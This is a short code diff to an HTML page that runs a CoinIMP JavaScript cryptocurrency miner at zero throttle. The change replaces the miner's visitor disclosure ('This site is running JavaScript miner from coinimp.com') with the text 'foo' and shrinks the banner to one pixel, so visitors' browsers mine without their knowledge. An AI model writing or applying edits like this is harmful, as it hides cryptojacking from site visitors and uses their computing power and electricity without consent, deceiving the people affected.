--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
         throttle: 0, c: 'w'
     });
     _client.start();
-    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
+    _client.addMiningNotification("Top", "foo", "#cccccc", 1, "#3d3d3d");
  
 </script>
 </html>
